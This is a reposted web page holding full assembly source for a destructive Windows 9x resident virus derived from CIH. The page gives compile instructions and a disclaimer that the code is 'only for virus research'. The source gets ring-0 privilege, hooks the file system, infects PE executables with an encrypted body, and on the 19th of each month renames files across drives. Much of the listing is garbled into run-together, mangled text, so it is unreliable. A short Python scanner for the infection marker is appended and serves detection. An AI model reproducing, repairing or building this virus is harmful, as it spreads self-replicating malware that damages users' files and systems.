Resident virus under Win98


;***********************************************************************
;*                          Editor's words                             *
;* ------------------------------------------------------------------- *
;* (1) Compile and link method (with the Tasm 5.0 compiler):           *
;*        tasm /m bit                                                  *
;*        tlink32 bit                                                  *
;* ------------------------------------------------------------------- *
;* (2) This is a true virus program, only for computer users with a    *
;*     strong interest in virus research. If someone uses it for       *
;*     malicious dissemination, the author has nothing to do with it.  *
;* ------------------------------------------------------------------- *
;* (3) This program is extremely destructive, please don't try it      *
;*     lightly.                                                        *
;* ------------------------------------------------------------------- *
;* (4) References:                                                     *
;*        CIH source program, CAW source                               *
;*        MSDN documentation, "Mystery of Windows 95 System Programming" *
;***********************************************************************

;*********************************************************************
;* This is a 32-bit virus program that can infect Windows 9X systems  *
;*********************************************************************
.586p
.model flat
.code

; ***************; * Set the run status of the program *; *************** ******** Debug = 0; ******************; * VXD function call *; ************ ***** _ PAGEAllocate = 00010053HIFSMGR_RING0_FILEIO = 00400032HUNITOBCSPATH = 00400041HIFSMGR_INSTALLESYSTEMAPIHOOK = 00400067H; ******************************************************************* ********************************************; * *; * boot module *; * *; ************************************************************ ***************************************** Start: @a = $ xchg eax, esioriginaLENTRYPOINT = $ 1 MOV EAX, 'Pvok' xor eax, esi [key- @ a] push eaxif debug interruptnumber = 05HELSE interruptnumber = 03hendif

PUSH EAX SIDT [ESP-02H] POP ​​EBX Add Ebx, InterruptNumber * 08H

Lea Eax, ESI [MyFaultHook- @ a] Push Eax CLI MOV [EBX], AX SHR EAX, 16 MOV [EBX 6], AX STI Pop Eax; ************** ************; * Generate an interrupt to get 0 privileges *; ************************* INTERRUPTNUMBERQUITMYPROGRAM: POP EaxReturnFrommyProgram: RET DB 0E0H; ***********; * Data area *; *********** KEY DB 0LOCATIONTABLE DD SIZEOFSECTIONB; segment size DD OFFSTOFSECTIONB 401000H; Duan's virtual address DD 0, 0 DD 0, 0 DD 0, 0; ***********************; * My Ring0 privilege code *; ******************************************** MYFAULTHOK: MOV ECX, DR3 Jecxz MyProgramisNotinstalled IretMyProgramisNotinStalled: xor Eax, EAX CDQ Push 0fh; Flag Push Eax; Physaddr Dec EDX push edx; maxPhys push eax; minPhys push eax; AlignMask push eax; VM = 0 inc eax; Let EAX = 1 push eax; nType = PG_SYS (01h) push eax; nPages = 1 int 20h dd _PageAllocate add esp, 04h * 08htest Eax, EAX JNZ SUCCESSFULLYALLOCATE IRETD

SuccessFullyallocate: MOV EDI, EAX PUSHAD LEA EBX, ESI [LocationTable-Start]; Access to the base number MOV EAX, ESI [Key- @ A-1]; obtain the unlocked key; ******** *********************************; * Copy the virus code to allocated system memory area *; * *************************************************** To ECX, ECX MOV CL, SIZEOFSECTIONA CLD REP MOVSB ​​PUSH EDINUMBEROFSECTIONS = $ 1 MOV DL, 1LOOPOFTRANSFERRING: MOV ECX, [EBX] MOV ESI, EBX [4] Add EBX, 8 CALL ConvertCode DL jnz loopoftransferring ret; ************ ****************************; * Encryption / decryption program *; * ------------- ------------------------- *; * Entrance parameters: *; * AH - key *; * ECX - to encrypt the byte Number *; * ESI - start address *; * EDI - stored address of encrypted information *; ******************************************************************** CONVERTCODE: @B = $ CLDLOOPOFCONVERTING: lodsb xor al, ah stosb loop LoopOfConverting ret; **************************************** **************************************; * *; * Guide module end *; * * *********************************************************** ****************************; -------------------- -------- SizeOfsectionA = $ -start offsetofsectionb = $ -start;

----------------------------; ********************* *********************************************************** *******;* *;* functional module *;* *;******************************* ****************************************************** Sectionb :; *************************; * Install the file hook of IFSMGR *; ************** *********** popad add eax, MyFileSystemApiHookFunction-Start mov esi, eax push eax int 20h dd IFSMgr_InstallFileSystemApiHook pop ecxtest eax, eax jnz SuccessfullyInstallFileSystemApiHook iretdSuccessfullyInstallFileSystemApiHook: mov dr3, esi lea ecx, edi [PreFileSystemApiHook-Start] MOV [ECX], EAX Save the previous file hook Dec Byte Ptr ECX [isbusy-prefilesystemapihook]; set my file hook 'idle' flag IRETD; *********************; * Restore old search path *; ******************************** GETOLDSEARCHPATH: SUB EDI, ECX MOV [EDI], '*. *' Ret; ** ******************; * My file hook function *; ******************** * MyFileSystemapiHookFunction:

; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
; When the system enters the file hook function, the stack is laid out
; as shown below:
;   ______________________________
;  | Return EIP       |  low address
;  |__________________|
;  | FSDFnAddr        | ---> 00h
;  |__________________|
;  | FunctionNum      | ---> 04h
;  |__________________|
;  | Drive            | ---> 08h
;  |__________________|
;  | ResourceFlags    | ---> 0Ch
;  |__________________|
;  | CodePage         | ---> 10h
;  |__________________|
;  | pir              | ---> 14h
;  |__________________|  high address
;
; After the 'pushad' instruction, the stack is laid out as shown below:
;   ______________________________
;  | EDI              | ---> ESP (low address)
;  |__________________|
;  | ESI              |
;  |__________________|
;  | EBP              |
;  |__________________|
;  | ESP              |
;  |__________________|
;  | EDX              |
;  |__________________|
;  | ECX              |
;  |__________________|
;  | EBX              |
;  |__________________|
;  | EAX              |
;  |__________________|
;  | Return EIP       | ---> 20h
;  |__________________|
;  | FSDFnAddr        | ---> 24h
;  |__________________|
;  | FunctionNum      | ---> 28h
;  |__________________|
;  | Drive            | ---> 2Ch
;  |__________________|
;  | ResourceFlags    | ---> 30h
;  |__________________|
;  | CodePage         | ---> 34h
;  |__________________|
;  | pir              | ---> 38h (high address)
;  |__________________|
; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
call @C
GetBaseAddressOfFileNameString: lea esi, edx [130h] cmp byte ptr [esi], 0 jnz QuitGettingBaseAddressOfFileNameString lea esi, edx [2Ch] QuitGettingBaseAddressOfFileNameString: ret @ C: pop edi add edi, VxdCall_IFSMgr_Ring0_FileIO- @ C; in this module, EDI As the base number MOV EBP, ESP CMP BYTE PTR EDI [ISBUSY- @ D], 00H; my file hook "idle"? Jz myfilesystemapihookfunction managementInsfree; ************** *****************; * If my file hook function is busy, then *; * only calls the FSD service and returns *; ******** ********************************* MYFILESTEMAPIHOK FunctionInsbusy: Push DWORD PTR EBP [38H]; [EBP 38H] -> FSD Service Uppoint Call EBP [24h] POP ​​ECX MOV EBP [1ch], EAX; Save FSD Service Return Value Popad Ret; ***** *************; * My file hook function is idle *; ******************* ******* MyFileSystemapiHookFunctionInsystem: CMP DWORD PTR EBP [28h], 36; Is the FSD function number for IFSFN_Open? JNZ GotopRefilesystemapihook byte Ptr Edi [isbusy- @ D]; Set my file hook 'busy' flag

MOV EDX, EBP [38H] MOV EDX, EDX [0ch] Add Edx, 4; EDX points to Unicode path Lea ESI, EDI [BCSWANSIFILENAME]; ESI points to buffer MOV Al, EBP [2ch] CMP Al, -1; Whether to be a UNC (Universal Naming Conversation) address? JZ Callunitobcspath Add Al, 40H MOV [ESI], Al Inc ESI MOV BYTE PTR [ESI], 'INC EsicalLunitobcspath: xor ECX, ECX PUSH ECX; Charset = BCS_WANSI PUSH 07FH; File Name Buffer Baxle Push Es; Unicode String's Atax Push ESI; Buffer INT 20H DD Unitobcspath Add ESP, 04H * 04H

MOV [ESI ESI EAX-4], 'EXE.'; Is this file a executable file? JNZ AbortonnoexecutableFileif Debug CMP [ESI EAX-8], 'Tset'; is a test file (Effective in debugging)? JNZ AbortonnoExecutablefileEndif Dec ESI Dec ESI; ESI points to the base address of the ordinary ASCII string; ######################### ####; # my triggered execution #; ############################################################################################################################################################################################################################################################################ 2 IN AL, 71HIFE Debug Sub Al, 019H; Judgment Date Else Sub Al, 019hendif Jnz EXIX; *********************************************** ********* ********; * Maken name function *; * register parameter: *; * ESI: point to the current path string *; * Edi: Point to the current path string End *; * Edx: pointing to Win32_find_data structure *; *** ***************************************************** If debug incnord PTR EDI [Drivenumber- @ D] endif xchg EBP, EDI LEA EDX, EBP [Win32_Find_Data] Lea ESI, EBP [PATH] Drivenumber = $ 2IF Debug Mov [ESI], '* /: G'ELSE MOV [ESI],' * /: C'endif Mov DWORD PTR ESI [4], "*."; Search Path: 'G: /*.*', 0 Lea EDI, ESI [3]

LEA EAX, EBP [QuitmyTrigger- @ D] push eax; pressing an export address; ***************************************** ********; * Search all directories and files on the hard disk with recursive method *; ************************* ************* scandisk:; ************************; ** Find file and change file Name **; ************************* MOV AX, 4E00H Push 07h POP ECX Call EBP JC Nomorefiles Xchg EAX, EBX; *** ******************; * Form a replacement file name *; ******************** Push ESI PUSH EDI MOV ECX, EDI SUB ECX, ESI Lea EDI, EBP [ReplacingFileName] CLD Rep Movsb Mov Eax, '0000' Stosd Mov Eax, 'Tib.' Stosd Mov [EDI], CL Pop Edi Pop EsisearchNextFile:; * **************; * forms an alternative file name *; *************** ******* Push EDI Push ESI CALL GetBaseAddressoffilenameString Push 13 Pop Ecx CLD Rep Movsb Pop ESI POP EDI

Push Edx Lea Edx, EDI [ReplacingFileName-Path] MOV EAX, [EDX]; ******************************; * Digital ASCII string self-add program *; ************************************** Add Eax, 1 aaa push 03h POP ECXLOOPOFASCIIINC: PUSH EAX LAHF and AH, 0EFH; Clear 'AF' Sign Sahf Pop Eax Pushfd Ror Eax, 8 Popfd AAA Loop LoopofasciiInc Ror Eax, 8 or Eax, 30303030H; -------------- --------------------------------------- ------------------------------- MOV [EDX], EAXLEA EDX, EBP [ReplacingFileName] MOV AX, 5600H CALL EBP POP EDX

MOV AX, 4F00H Call EBP JNC SearchNextFile

MOV AX, 0DC00H Call EBPNOMOREFILES: MOV [EDI], '*. *'; -------------------------------- ---------------- mov ax, 4E00h mov cx, 1016h call ebp xchg eax, ebx jc NoMoreDirectories call GetNewSearchPath jecxz SearchNextDirectory push ebx push ecx call ScanDisk pop ecx pop ebx call GetOldSearchPathSearchNextDirectory: mov ax, 4F00h call ebp jc NoMoreDirectories call GetNewSearchPath jecxz SearchNextDirectory push ecx push ebx call ScanDisk pop ebx pop ecx call GetOldSearchPath jmp SearchNextDirectoryNoMoreDirectories: mov ax, 0DC00h call ebp Ret; ###################; # my triggered execution ends #; ####### ##################################################### ***************************; * Get the final modification date / time *; ********** ****************************; * IFSMGR_RING0_FILEIO's 4304 service is * ; * Get the final modification time / date of the file. But in fact, the service *; * * only returned to the modification time in CX. So what we care about *; * Is another return value? Fortunately, we finally *; * Find it. It is located in the abandoned stack, the linear address is *; * [ESP-0B4H]. Note that the value of the ESP is the value of the execution instruction *; * INT 20H vxdcall ifsmgr_ring0_fileio, is the value of *; * ESP.

********************************************************* * MOV AX, 4304H Call EDI SHL ECX, 16 MOV CX, ESP [-0b8h] MOV EDI [ReadingBuffer-14H], ECX; *****************; * Get Document attribute *; *****************, EAX, EAX MOV AH, 43H; Get_Attributes XOR ECX, ECX PUSH EBX, ECX Test BL, 01H Is the file be read-only file? JZ NOTREADOONLYFILE; *****************************; * To modify read only files to Ordinary documents *; ************************************** Inc EAX XOR ECX, ECX Call Edi JC AbortonmodiFile: Push EBX; Save File The original attribute; *********************; * is read / write open file *; ************** ****** XOR EAX, EAX MOV AH, 0D5H; R0_OpenCreatfile XOR ECX, ECX; Attribute s = FILE_ATTRIBUTE_NORMAL (00h) cdq inc edx; Action = FILE_OPEN (01h) mov ebx, edx inc ebx; ModeAndFlags = OPEN_ACCESS_READWRITE (02h) call edi jc AbortOnOpeningFailure xchg ebx, eax; save file handle to EBX; ****** *************; * read the DOS file header *; ****************** XOR EAX, EAX MOV AH, 0D6H; R0_READFILE PUSH 40H POP ECX; DOS file header size CDQ; start position of the read operation Lea ESI, EDI [ReadingBuffer]; ESI points to the read buffer Push Eax Call EDI POP EAX; ********* **************; * read into the NT file head and the section table *;

************************ MOV EDX, ESI [3ch]; image_dos_header [3ch] points to the offset address of the new EXE file header MOV ESI [- 0ch], EDX; Save the offset address of the NT file header MOV ECX, 378H; 378h is the size of the NT file header and the segment array array of Call EDI CMP DWORD PTR [ESI], 00004550H; this file is an executable file in a PE format ? Jnz abort; ****************; * Check if the file has been infected *; ********* **************** CMP Word PTR ESI [0FEH], 'Cr'; 'RC' is the file that has been infected or file does not have enough space for the remaining space. JZ Abort Movzx Eax, Word PTR ESI [06H]; Image_NT_Headers [06h] -> Numberofsections MOV ECX, EAX XCHG EBP, EDX; EDX is offset CDQ MoV DL, 28h Mul Edi [ReadingBuffer-10h], 0F8H MoV EDI [ReadingBuffer-10h], Eax; save the actual size add Eax, EBP, EBP, calculating the NT file header and the array array; calculates the offset address MOV ESI ESI ESI (-08h], ESI; save the PE file Head offset address in the free space xchg ecx, ebp; EBP = NumberOfSections mov edx, esi [10Ch]; IMAGE_NT_HEADERS [10Ch] -> PointerToRawData mov esi [54h], edx; IMAGE_NT_HEADERS [054h] -> SizeOfHeaders sub edx, eax Get the size of the idle space MOV ESI [-04h], EDX; ----------------------------------- ------------- Lea EAX, ESI [100H] xor ECX, ECX MOV CL, SIZEOFSECTIONA MOV EDX, EAX [08H] Sub Edx, [EAX] CMP EDX, ECX JB RemainNospaceForsectiona Mov Edx, [EAX]; [eax] ->

Virtualsize Add Edx, EAX [04H]; [EAX 4] -> Vitualaddress Xchg ESI, EDX; Save new entry address RVA; -------------------------------------------------------------------------------------------------------------------------- ---------------------------- Mov Edx, Eax [0ch] Add Edx, [EAX] Add [EAX], ECX JMP InsertsectionBremainNospaceForsectiona: cmp edi [ReadingBuffer-04h], ecx jb AbortOnInsufficientSpace mov edx, edi [ReadingBuffer-08h] mov esi, edx add edi [ReadingBuffer-08h], ecx; free space to adjust the offset sub edi [ReadingBuffer-04h], ecx; Adjusting the size of the idle space Insertsectionb: Push ESI PUSH EDX; Save the offset address of the insert position Push ECX PUSH 0; Press End Sign MOV EDI [ReadingBuffer-18h], EBX; Save EBX XOR EBX, EBX MOV ECX, SIZEOFSECTIONB; * *************************; * * is the 'model of my program Block 'looking for space *; *************************; ________________________________; | |;; | | | | ____________________ |; | | | | | | | | | -> 004H; | | | | | -> 004H; | | | | | -> 008H; | SizeOfRawData |; | _____________________ |; | | ---> 00Ch; | PointerToRawData |; | _____________________ |; | | ---> 010h; | PointerToRelocations |; | _____________________ |; | | ---> 014h; | PointerToLinenumbers | ; | ____________________ |; | | ---> 018H; | NumberOfrelocations |; | | _____________________

| | ---> 01Ah; | NumberOfLinenumbers |; | _____________________ |; | | ---> 01Ch; | Characteristics |; | _____________________ | LoopOfInsertingSectionB: mov edx, eax [08h]; [EAX 08h] -> SizeOfRawData sub EDX, [EAX]; calculating the difference in SizeOfrawData and VirtualSize (this difference is the size of the remaining space in this section) JB SearchNextSection; prevents the handle CMP EDX, ECX JB LessSpaceThanneed Mov Edx, ECX JMP SaveParameterLessSpaceThanneed: CMP EDX, 100 JB SearchnextSection Xchg ECX, EdxsaveParameter:; ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- Mov ESI, EAX [04H] Add ESI, EDI [ReadingBuffer 34h] Add ESI, [EAX] Push ESI; Save the virtual address of this paragraph; ---------------------------------------------- MOV ESI , EAX [0CH]; [EAX 0CH] -> PointertorawData Add ESI , [EAX]; Offset address of this segment insertion position Push ESI; save the offset address of the insertion position; ----------------------- -------------------------- ADD [EAX], ECX; ---------------------------------------------------------------------- ----------------------------------- Push ECX; save this size Sub EDX, ECX XCHG ECX, EDX; how many bytes are not written;

-------------------------------------------------- inc ebx jecxz WriteSectionB cmp bl, 03h jz SearchSpaceInFileHeaderSearchNextSection: add eax, 28h dec ebp jnz LoopOfInsertingSectionBSearchSpaceInFileHeader: cmp edi [ReadingBuffer-04h], ecx jnb FindSpace; ------------------ ------------------------------ XCHG ECX, EBX XCHG EBX, EDI [ReadingBuffer-18h]; ------ ------------------------------------------ Push 12 Pop Eax Mul ECX Add Eax 16 Add ESP, EAX; ------------------------------------------- ----- JMP AbortoninsufficientSpaceFindspace: Mov Eax, EDI [ReadingBuffer-08h] MOV EDX, EAX Add Edx, EDI [ReadingBuffer 34h] Push EDX; Save the last section of the virtual address PUSH EAX; Save the offset address of the last insertion position Push ECX; save the last segment of size Inc EbxWrItemSectionB:; ************************ *********; * Transfer my program code to the write buffer *; *********************** *********** Lea Edx, EDI [ConvertCode- @ D] MOV EDX [Key- @ B], AH MOV ECX, SizeOfsectionB Lea ESI, EDI [WritingBuffer] Push Edi Lea EDI, EDX [Sectionb - @ B] XCHG ESI, EDI Call Edx Pop EBP XCHG ESI, EDI; -------------------------------------------------------------------------------------------------------------------------- --------------- XCHG ECX, EBX XCHG EBX, EBP [ReadingBuffer-18h]; Restore EBX;

------------------------------------------------ MOV EDX [Numberofsections- @ B], Cl; Save Function Module Different Segment LEA EDI, [EDX LocationTable- @ B 8 * ECX-4] LoopofwritingSectionB: MOV AX, 0D601H POP ECX Jecxz FinishWritingSectionB Pop Edx Sub ESI, ECX Call EBP POP EAX STSD STOSD XCHG EAX, ECX Stosd JMP loopofwritingsectionbfinishwritingsectionb: xchg EBP, EDI; ******************** ;;;;;;;;;;;;;;;;;;;;;;;;; * Get and save the entrance address of the original program *; *************************************** LEA EBP, EDI [ReadingBuffer] MOV eax, ebp [34h]; IMAGE_NT_HEADERS [34h] -> ImageBase add eax, ebp [28h]; IMAGE_NT_HEADERS [28h] -> AddressOfEntryPoint lea esi, edi [Start- @ D] lea ecx, esi [ReturnFromMyProgram- @ A] mov BYTE PTR [ECX], 0FFH ; Generate a 'JMP EAX' instruction to turn control to the original program add ECX, OriginaLENTRYPOINT-RETURNFROMMYPROGRAM; ***************; * Enter the import address of the original program *; *********************************** BaX, ESI [Key- @ a] MOV [ECX], Eax; *************************; * Insert the 'boot module' * of the virus; *********** *************** MOV AX, 0D601H POP ECX POP EDX CALL EDI POP EAX MOV EDI [ReadingBuffer 28h], EAX; Modify the entry address of the program; ******* *******************; * Modify the NT file header of the original program *; ******************** ****** Abortoninsufficientspace: Mov Word Ptr Edi [ReadingBuffer 0FEH], 'Cr';

Set infection markers MOV AX, 0D601H MOV ECX, EDI [ReadingBuffer-10h] MOV ESI, EBP MOV EDX, EDI [ReadingBuffer-0ch] Call Edi JMP Closefileabort: xor ECX, ECX; ********** ***; * Close the file *; ************* Closefile: XOR EAX, EAX MOV AH, 0D7H Call Edi; ************* *************; * Restore file final modification date / time *; ***************** **************** JECXZ RestorefileAttribute Lea ESI, EDI [BCSwanSifilename] XCHG EDI, EBX MOV AX, 4303H MOV ECX, EBX [ReadingBuffer-12h] MOV EDI, EBX [ReadingBuffer-14h ] Call EBX XCHG EDI, EBXABORTONOPENINGFAILURE:; ******************; * Restore file properties *; *************** ** RestorefileAttribute: POP ECX MOV AX, 4301H Test CL, 01H JZ NOTESTOREFILEATTRIBUTE Call ediabortonnoexecutablefile: AbortonmodifyingAttributeFail = $ quitmytrigger = $ notrestorefileAttribute = $ call @e; ********************************************* ******; * Form a new search path based on the results of the lookup *; ***************************** ********** GetnewSearchPath: Push ESI CALL GetBaseaddressoffilenameString XOR ECX, ECX CMP Byte Ptr [ESI], '.'; In the DOS system, '.' Represents the current directory, '..'

It indicates the parent directory jz QuitGettingNewPath cldLoopOfGettingNewPath: lodsb test al, al jz ReachEndOfString stosb inc ecx jmp LoopOfGettingNewPathReachEndOfString: mov byte ptr [edi], '/' inc edi mov [edi], '* *.' Inc ecxQuitGettingNewPath: pop esi ret @ E : pop edi dec byte ptr edi [IsBusy- @ E]; set up my files hook 'idle' flag GotoPreFileSystemApiHook: popadPreFileSystemApiHook = $ 2 jmp ds: [ 'PVOK'] VxdCall_IFSMgr_Ring0_FileIO: @D = $ int 20h dd IFSMgr_Ring0_FileIO ret; *******************; * Data section a *; **************************** ISBUSY DB 1 *********************************************************** **; * Dynamic data part *; * ---------------------------------------- --------- *; * The data does not take up any disk space, they are located in the system memory area *; ********************************** *************************; ******************************* ********************* = $ - @D 48HREPLACINGFILENAME = start- @ D 0700HWIN32_FIND_DATA = START- @ D 0C00H; ****** ******************************************** BCSWANSIFILENAME = START- @ D 0a00hreadingBuffer = $ - @ D 28H; (Relative to EDI) WritingBuffer = start- @ D 0B00H; (Relative to EDI); *********************************** ************** SIZEOFSECTIONB = $ -SECTIONB

The usage of system memory area for my program application; _________________________; | | ---> offset 0; |;;;;;;;;;;;; | |; | | ==> Save EBX Register (ReadingBuffer-18h); | | ==> Last Write Date / Time (ReadingBuffer-14h); | | ==> Size of Section Array (ReadingBuffer-10h); ==> Pe Header RVA (ReadingBuffer-0ch); | | ==> Pointer to Free Space (ReadingBuffer-08h); | _________________________ | ==> Size Of Free Space (ReadingBuffer-04h); | | | -> Offset ??? h; | | | | | ==> Offset 0: reading buffer; | |; | _________________________ |; | | |-> Offset 800h; | section THREE | ==> Offset 0: ANS I file name; | |; | |; | |; | | -> offset C00H; | | | | | | ;____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ |

;*********************************************************************
;*                                                                   *
;*                        Function module end                        *
;*                                                                   *
;*********************************************************************
MyProgramSize = $ - Start
end Start

;*************************************************************
;* Summary                                                   *
;* This program can do the following:                        *
;* (1) get ring0 privilege                                   *
;* (2) install a FileSystemApiHook                           *
;* (3) my FileSystemApiHook runs steadily                    *
;* (4) the second part of my code is encrypted               *
;* (5) the program will be activated on the 19th day of      *
;*     every month. After it has been activated, it will     *
;*     search all hard disk drives except C for all files    *
;*     and rename them with a new file name with the         *
;*     extension '.bit'.                                     *
;*************************************************************
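A defender-side check for the trace this infector leaves in a PE file, added here as an example and not part of the original program: the source writes the word immediate 'Cr' at NT header + 0FEh (bytes 6..7 of the first section's name) both when it infects a file and when it gives up for lack of space, so a scanner can look for that marker, report which section holds the entry point, and list each section's SizeOfRawData - VirtualSize slack (the space the infector hunts for). The on-disk byte order "rC" is assumed from how TASM stores multi-character word immediates, and the sample PE is a constructed header-only layout.

```python
import struct

# The source tags a file by writing the TASM word immediate 'Cr' at NT header +
# 0FEh, i.e. bytes 6..7 of the first section name. A TASM multi-character word
# immediate puts its first character in the high byte, so the bytes as they
# appear in the file are "rC" (assumption based on that convention; the
# source's own comment calls the marker 'RC').
INFECTION_MARKER = b"rC"
MARKER_OFFSET_FROM_NT = 0xFE   # 0F8h (PE32 NT header size) + 6


def _u16(b: bytes, o: int) -> int:
    return struct.unpack_from("<H", b, o)[0]


def _u32(b: bytes, o: int) -> int:
    return struct.unpack_from("<I", b, o)[0]


def scan_pe(data: bytes) -> dict:
    """Report whether a PE32 image carries the marker and where its entry point lives."""
    report = {"is_pe": False, "marker": False, "entry_rva": None,
              "entry_section": None, "slack": {}}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return report
    nt = _u32(data, 0x3C)                        # IMAGE_DOS_HEADER.e_lfanew
    if nt + 0x100 > len(data) or data[nt:nt + 4] != b"PE\0\0":
        return report
    report["is_pe"] = True
    marker_at = nt + MARKER_OFFSET_FROM_NT
    report["marker"] = data[marker_at:marker_at + 2] == INFECTION_MARKER
    nsections = _u16(data, nt + 6)               # IMAGE_NT_HEADERS[06h] -> NumberOfSections
    opt_size = _u16(data, nt + 20)               # SizeOfOptionalHeader
    entry = _u32(data, nt + 0x28)                # IMAGE_NT_HEADERS[28h] -> AddressOfEntryPoint
    report["entry_rva"] = entry
    table = nt + 24 + opt_size                   # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        s = table + i * 40
        if s + 40 > len(data):
            break
        name = data[s:s + 8].split(b"\0", 1)[0].decode("latin-1")
        vsize, vaddr, rawsize = _u32(data, s + 8), _u32(data, s + 12), _u32(data, s + 16)
        # SizeOfRawData - VirtualSize is the slack the infector looks for when
        # placing its code; a suspicious entry point tends to sit in such a section.
        report["slack"][name] = rawsize - vsize
        if vaddr <= entry < vaddr + max(vsize, rawsize):
            report["entry_section"] = name
    return report


def build_sample_pe(infected: bool) -> bytes:
    """Constructed minimal PE32 layout (headers only, not a runnable program)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)  # ImageBase
    struct.pack_into("<I", opt, 0x3C, 0x200)     # SizeOfHeaders
    sect = bytearray(40)
    sect[:8] = b".text\0\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", sect, 8, 0x100, 0x1000, 0x200, 0x200)
    if infected:
        sect[6:8] = INFECTION_MARKER             # what the infector leaves behind
    img = dos + b"PE\0\0" + file_hdr + bytes(opt) + bytes(sect)
    return img + b"\0" * (0x400 - len(img))


if __name__ == "__main__":
    for flag in (False, True):
        print(scan_pe(build_sample_pe(flag)))
```

To scan a real file, pass its bytes to scan_pe; a True marker plus an entry point in a section with large slack is the combination this particular infector produces.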

Please credit the original source when reprinting: https://www.9cbs.com/read-51522.html
